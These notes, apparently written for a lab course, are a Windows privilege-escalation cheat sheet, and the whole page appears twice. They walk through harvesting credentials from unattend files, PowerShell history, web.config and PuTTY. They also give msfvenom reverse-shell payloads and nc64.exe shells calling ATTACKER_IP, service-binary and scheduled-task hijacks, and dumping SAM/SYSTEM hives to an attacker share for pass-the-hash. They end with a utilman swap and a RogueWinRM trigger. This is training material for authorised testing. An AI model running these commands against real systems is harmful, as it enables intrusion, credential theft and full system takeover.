Windows Privilege Escalation

Harvesting Passwords from Usual Spots

Unattended Windows Installations

Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials

Unattended Windows Installations

Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials

<Credentials>
 <Username>Administrator</Username>
 <Domain>thm.local</Domain>
 <Password>MyPassword123</Password>
</Credentials>

PowerShell History

If a user runs a command that includes a password it can be retrieved by using the following command"

# This will only work from cmd.exe 
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

Windows allows the use of other users' credentials. The command below lists saved credentials

cmdkey /list

# If you notice any credentials worth trying, use them with this command 
runas /savecred /user:admin cmd.exe

IIS Configuration

IIS config is stored in a file called web.config and can store passwords for databases or authentication mechanisms.
File can be found here:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Quick way to find database strings on the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from PuTTY

PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials
Command to retrieve stored proxy credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

Look for scheduled tasks that either lost its binary or are using a binary you can modify

# Retrieve detailed information 
schtasks /query /tn vulnask /fo list /v 

# We care about the "Task to Run" and "Run As User" parameters 

# Check file permissions of the Task to Run file 
icacls C:\tasks\schtask.bat

# If nc64.exe available we can use that to spawn a reverse shell 
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

# Start listener on attacker machine
nc -lvp 4444

AlwaysInstallElevated

Windows installer files usually run with the privilege level of the user that starts it.
These can be configured to run with higher privileges from any user account, this could allow us to generate a malicious MSI file that would run with admin privileges
This method requires two registry values to be set. You can query these from the command line using the commands below

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_x.x.x.x LPORT=LOCAL_PORT -f msi -o malicious.msi

# You should also run the Metasploit Handler module. 
# Once you have transferred the file you created, run the installer with this command and get the reverse shell 
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows Services

Service Control Manager (SCM) is a process in charge of managing the state of services as needed

# Get service configuration
sc qc 

# Service configurations are stored on the registry under 
HKLM\SYSTEM\CurrentControlSet\Services\

Insecure Permissions on Service Executable

If executable associated with a service has weak permissions that allows us to modify or replace it, we can gain privileges of the service's account

# Query the service configuration 
sc qc WindowsScheduler

# check permissions 
icacls BINARY_PATH_NAME

# Generate an exe-service payload using msfvenom and serve it through a python webserver
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server

# Pull the payload from victim machine using powershell 
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

# Replace the service executable with our payload
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Unquoted Service Paths

Particular behavior happens when the service is configured to point to an "unquoted" executable. This means the path of the associated executable isn't properly quoted to account for spaces on the command
When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute:
This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute C:\\MyPrograms\\Disk.exe and take the rest as arguments.
Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:

First, search for C:\\MyPrograms\\Disk.exe. If it exists, the service will run this executable.
If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter.exe. If it exists, the service will run this executable.
If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.

# Create payload using msfvenom 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe 

# Move payload and grant permissions 
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

# restart service 
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

Insecure Service Permissions

If the service DACL lets you modify the configuration then you can reconfigure the service
This will let you point to any executable you need and run it with any account you prefer, including SYSTEM itself

# use accesschk from the sysinternal suite to check for a service DACL
accesschk64.exe -qlc SERVICE_NAME

# if the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission then any user can reconfigure the service

# Create msfvenom and move it to the victim machine using the same steps as before

# Re-configure the service 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# Restart service 

- If binaries are installed in non-default paths that is world-writable (anything other than C:\\Program Files or C:\\Program Files(x86)) then the vulnerability can be exploited. 
 - For example if it is installed in C:\\MyPrograms (inherits permissions of C:\\ directory which allows any user to create files and folders in it.)
- The process of creating a payload with msfvenom is the same as before

Insecure Service Permissions

If the service DACL (not the service's executable DACL) lets you modify the configuration of a service, then you can reconfigure the service
This let's you point to any executable and run it with the account you prefer.

# You can check for a service DACL from the CLI using Accesschk
# Accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice

# If the Users groups has SERVICE_ALL_ACCESS permission, that means you can reconfigure the service

# Create msfvenom payload 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

# start listener in attacker
nc -lvp 4447

# transfer payload using python and wget 

# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

# Change the service's associated executable and account 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# We choose to use LocalSystem account because it is the highest privileged account 

# Trigger payload 
sc stop THMService
sc start THMService

Abusing Dangerous Privileges

Windows Privileges

A complete list of available privileges on Windows systems is available here.
You can find a comprehensive list of exploitable privileges on the Priv2Admin Github project.

# Check user privileges 
whoami /priv

SeBackup / SeRestore

Allows users to read and write to any file in the system, ignoring any DACL in place
Allows certain users to perform backups from a system without needing full admin privileges
We can escalate privileges by copying the SAM and SYSTEM registry hives to extract local Admin's password hash

Technique: Copy SAM and SYSTEM registry hives to extract the local Admin's password hash

# Check privileges 
whoami /priv

# Backup SAM and SYSTEM hashes 
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

# Copy files to atacker machine using SMB or other available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share 
# This creates a share named public pointing to the share directory and requires the username and password of the current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

# Use the copy command in target machine to transfer files to your attack box 
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public

# Use impacket to get password hashes 
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL 

# Use Admin hash to perform a pass-the-Hash attack and gain access to target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP 

# Check you get SYSTEM privileges 
whoami

SeTakeOwnership

Allows users to take ownership of any object on the system, including files and registry keys
Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable

# Check privileges 
whoami /priv

# Abuse utilman.exe - a built-in windows app used to provide Ease of Access during the lock screen
# Utilman is run with SYSTEM privileges, we can gain SYSTEM privileges if we replace the original binary for any payload we like. 

# Replace utilman, by taking ownership of it 
takeown /f C:\Windows\System32\Utilman.exe

# Being owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command: 
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

# Replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe

# Trigger utilman by locking screen from the start button
# Click on the Ease of Access button, running utilman.exe with SYSTEM privileges. 
# Since we replaced it with cmd.exe we will get a command prompt with SYSTEM privileges

SeImpersonate / SeAssignPrimaryToken

Allow a process to impersonate other users and act on their behalf
Usually consists of being able to spawn a process or thread under the security context of another user
As attackers if we can take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process
The LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges
Things we need to elevate privileges

To spawn a process so that users can connect and authenticate to it for impersonation to occur
Find a way to force privileged users to connect and authenticate to the spawned malicious process

# Use RogueWinRM exploit to accomplish both conditions
# Assume we already compromised a website running on IIS and we planted a web shell 
# Use the web shell to check for assigned privileges of the compromised account and confirm we have both privileges of interest

# RogueWinRM exploit is possible because whenever a user (even unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Post 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell 

# If WinRM isn't running on victim server, an attacker can
# start a fake WinRM service on port 5985 and cath the 
# authentication attempt made by the BITS service 
# If the attacker has SeImpersonate privileges, you 
# can execute any command on behalf of the connecting user, 
# which is SYSTEM

# Trigger the RogueWinRM using the web shell 
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools.nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

Abusing vulnerable software

Unpatched Software

Use the wmic tool to list software installed on the target system and its versions

# Command will dump information it can gather on installed software
wmic product get name,version,vendor

Search for existing exploits on installed software online
- exploit-db
- packet storm

Tools of the Trade

WinPEAS
- Script developed to enumerate the target system to uncover privilege escalation paths
PrivescCheck
- PowerShell script that searches common privilege escalation on the target system
- To run PrivescCheck on target system, you might need to bypass the execution policy restrictions using Set-ExecutionPolicy Bypass -Scope process -Force
WES-NG
- Avoids making unnecessary noise that can attract attention because it runs on your attacking machine
- Before using it, type wes.py --update command to update the database
- To use the script run systeminfo command on the target system
- Direct the output to a .txt file you will need to move to your attacking machine

# Run wes.py 
wes.py systeminfo.txt

PreviousLinux Privilege Escalation NextInitial Enumeration

Last updated 11 months ago

Windows Privilege Escalation

Harvesting Passwords from Usual Spots

Unattended Windows Installations

Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials

Unattended Windows Installations

Unattended installations use an admin account to do initial setup, might end up being stored in the machine in these locations:
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\system32\sysprep.inf
- C:\\Windows\system32\sysprep\sysprep.xml
As part of these files you might find credentials

<Credentials>
 <Username>Administrator</Username>
 <Domain>thm.local</Domain>
 <Password>MyPassword123</Password>
</Credentials>

PowerShell History

If a user runs a command that includes a password it can be retrieved by using the following command"

# This will only work from cmd.exe 
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

Windows allows the use of other users' credentials. The command below lists saved credentials

cmdkey /list

# If you notice any credentials worth trying, use them with this command 
runas /savecred /user:admin cmd.exe

IIS Configuration

IIS config is stored in a file called web.config and can store passwords for databases or authentication mechanisms.
File can be found here:
- C:\inetpub\wwwroot\web.config
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
Quick way to find database strings on the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from PuTTY

PuTTY doesn't allow users to store their SSH password, but it will store proxy configurations that include cleartext authentication credentials
Command to retrieve stored proxy credentials

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks

Look for scheduled tasks that either lost its binary or are using a binary you can modify

# Retrieve detailed information 
schtasks /query /tn vulnask /fo list /v 

# We care about the "Task to Run" and "Run As User" parameters 

# Check file permissions of the Task to Run file 
icacls C:\tasks\schtask.bat

# If nc64.exe available we can use that to spawn a reverse shell 
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat

# Start listener on attacker machine
nc -lvp 4444

AlwaysInstallElevated

Windows installer files usually run with the privilege level of the user that starts it.
These can be configured to run with higher privileges from any user account, this could allow us to generate a malicious MSI file that would run with admin privileges
This method requires two registry values to be set. You can query these from the command line using the commands below

reg query HKCU\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer

# You can generate a malicious .msi file using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_x.x.x.x LPORT=LOCAL_PORT -f msi -o malicious.msi

# You should also run the Metasploit Handler module. 
# Once you have transferred the file you created, run the installer with this command and get the reverse shell 
msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Abusing Service Misconfigurations

Windows Services

Service Control Manager (SCM) is a process in charge of managing the state of services as needed

# Get service configuration
sc qc 

# Service configurations are stored on the registry under 
HKLM\SYSTEM\CurrentControlSet\Services\

Insecure Permissions on Service Executable

If executable associated with a service has weak permissions that allows us to modify or replace it, we can gain privileges of the service's account

# Query the service configuration 
sc qc WindowsScheduler

# check permissions 
icacls BINARY_PATH_NAME

# Generate an exe-service payload using msfvenom and serve it through a python webserver
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
python3 -m http.server

# Pull the payload from victim machine using powershell 
wget http://ATTACKER_IP:8000/rev-svc.exe -O rev-svc.exe

# Replace the service executable with our payload
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Unquoted Service Paths

Particular behavior happens when the service is configured to point to an "unquoted" executable. This means the path of the associated executable isn't properly quoted to account for spaces on the command
When the SCM tries to execute the associated binary, a problem arises. Since there are spaces on the name of the "Disk Sorter Enterprise" folder, the command becomes ambiguous, and the SCM doesn't know which of the following you are trying to execute:
This has to do with how the command prompt parses a command. Usually, when you send a command, spaces are used as argument separators unless they are part of a quoted string. This means the "right" interpretation of the unquoted command would be to execute C:\\MyPrograms\\Disk.exe and take the rest as arguments.
Instead of failing as it probably should, SCM tries to help the user and starts searching for each of the binaries in the order shown in the table:

First, search for C:\\MyPrograms\\Disk.exe. If it exists, the service will run this executable.
If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter.exe. If it exists, the service will run this executable.
If the latter doesn't exist, it will then search for C:\\MyPrograms\\Disk Sorter Enterprise\\bin\\disksrs.exe. This option is expected to succeed and will typically be run in a default installation.

# Create payload using msfvenom 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4446 -f exe-service -o rev-svc2.exe 

# Move payload and grant permissions 
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

# restart service 
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

Insecure Service Permissions

If the service DACL lets you modify the configuration then you can reconfigure the service
This will let you point to any executable you need and run it with any account you prefer, including SYSTEM itself

# use accesschk from the sysinternal suite to check for a service DACL
accesschk64.exe -qlc SERVICE_NAME

# if the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission then any user can reconfigure the service

# Create msfvenom and move it to the victim machine using the same steps as before

# Re-configure the service 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# Restart service 

- If binaries are installed in non-default paths that is world-writable (anything other than C:\\Program Files or C:\\Program Files(x86)) then the vulnerability can be exploited. 
 - For example if it is installed in C:\\MyPrograms (inherits permissions of C:\\ directory which allows any user to create files and folders in it.)
- The process of creating a payload with msfvenom is the same as before

Insecure Service Permissions

If the service DACL (not the service's executable DACL) lets you modify the configuration of a service, then you can reconfigure the service
This let's you point to any executable and run it with the account you prefer.

# You can check for a service DACL from the CLI using Accesschk
# Accesschk is included in the Sysinternals suite
accesschk64.exe -qlc thmservice

# If the Users groups has SERVICE_ALL_ACCESS permission, that means you can reconfigure the service

# Create msfvenom payload 
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4447 -f exe-service -o rev-svc3.exe

# start listener in attacker
nc -lvp 4447

# transfer payload using python and wget 

# Grant permissions to Everyone to execute the payload
icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F

# Change the service's associated executable and account 
sc config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem

# We choose to use LocalSystem account because it is the highest privileged account 

# Trigger payload 
sc stop THMService
sc start THMService

Abusing Dangerous Privileges

Windows Privileges

A complete list of available privileges on Windows systems is available here.
You can find a comprehensive list of exploitable privileges on the Priv2Admin Github project.

# Check user privileges 
whoami /priv

SeBackup / SeRestore

Allows users to read and write to any file in the system, ignoring any DACL in place
Allows certain users to perform backups from a system without needing full admin privileges
We can escalate privileges by copying the SAM and SYSTEM registry hives to extract local Admin's password hash

Technique: Copy SAM and SYSTEM registry hives to extract the local Admin's password hash

# Check privileges 
whoami /priv

# Backup SAM and SYSTEM hashes 
reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive

# Copy files to atacker machine using SMB or other available method
# For SMB, we can use smbserver.py to start a simple SMB server with a network share in a directory on the attacker machine
mkdir share 
# This creates a share named public pointing to the share directory and requires the username and password of the current windows session
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share

# Use the copy command in target machine to transfer files to your attack box 
copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public
copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public

# Use impacket to get password hashes 
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL 

# Use Admin hash to perform a pass-the-Hash attack and gain access to target machine with SYSTEM privileges
python3.9 /opt/impacket/examples/psexec.py -hashes ADMIN_HASH administrator@TARGET_IP 

# Check you get SYSTEM privileges 
whoami

SeTakeOwnership

Allows users to take ownership of any object on the system, including files and registry keys
Opens up possibilities for an attacker to elevate privileges. For example, search for a service running as SYSTEM and take over the service's executable

# Check privileges 
whoami /priv

# Abuse utilman.exe - a built-in windows app used to provide Ease of Access during the lock screen
# Utilman is run with SYSTEM privileges, we can gain SYSTEM privileges if we replace the original binary for any payload we like. 

# Replace utilman, by taking ownership of it 
takeown /f C:\Windows\System32\Utilman.exe

# Being owner of a file doesn't mean you have privileges over it
# Give your user full permissions over utilman.exe using this command: 
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F

# Replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe

# Trigger utilman by locking screen from the start button
# Click on the Ease of Access button, running utilman.exe with SYSTEM privileges. 
# Since we replaced it with cmd.exe we will get a command prompt with SYSTEM privileges

SeImpersonate / SeAssignPrimaryToken

Allow a process to impersonate other users and act on their behalf
Usually consists of being able to spawn a process or thread under the security context of another user
As attackers if we can take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process
The LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges
Things we need to elevate privileges

To spawn a process so that users can connect and authenticate to it for impersonation to occur
Find a way to force privileged users to connect and authenticate to the spawned malicious process

# Use RogueWinRM exploit to accomplish both conditions
# Assume we already compromised a website running on IIS and we planted a web shell 
# Use the web shell to check for assigned privileges of the compromised account and confirm we have both privileges of interest

# RogueWinRM exploit is possible because whenever a user (even unprivileged users) starts the BITS service in Windows, it automatically creates a connection to port 5985 using SYSTEM privileges
# Post 5985 is simply a port that exposes a PowerShell console
# Think of it as SSH but using PowerShell 

# If WinRM isn't running on victim server, an attacker can
# start a fake WinRM service on port 5985 and cath the 
# authentication attempt made by the BITS service 
# If the attacker has SeImpersonate privileges, you 
# can execute any command on behalf of the connecting user, 
# which is SYSTEM

# Trigger the RogueWinRM using the web shell 
C:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools.nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

Abusing vulnerable software

Unpatched Software

Use the wmic tool to list software installed on the target system and its versions

# Command will dump information it can gather on installed software
wmic product get name,version,vendor

Search for existing exploits on installed software online
- exploit-db
- packet storm

Tools of the Trade

WinPEAS
- Script developed to enumerate the target system to uncover privilege escalation paths
PrivescCheck
- PowerShell script that searches common privilege escalation on the target system
- To run PrivescCheck on target system, you might need to bypass the execution policy restrictions using Set-ExecutionPolicy Bypass -Scope process -Force
WES-NG
- Avoids making unnecessary noise that can attract attention because it runs on your attacking machine
- Before using it, type wes.py --update command to update the database
- To use the script run systeminfo command on the target system
- Direct the output to a .txt file you will need to move to your attacking machine

# Run wes.py 
wes.py systeminfo.txt

PreviousLinux Privilege Escalation NextInitial Enumeration

Last updated 11 months ago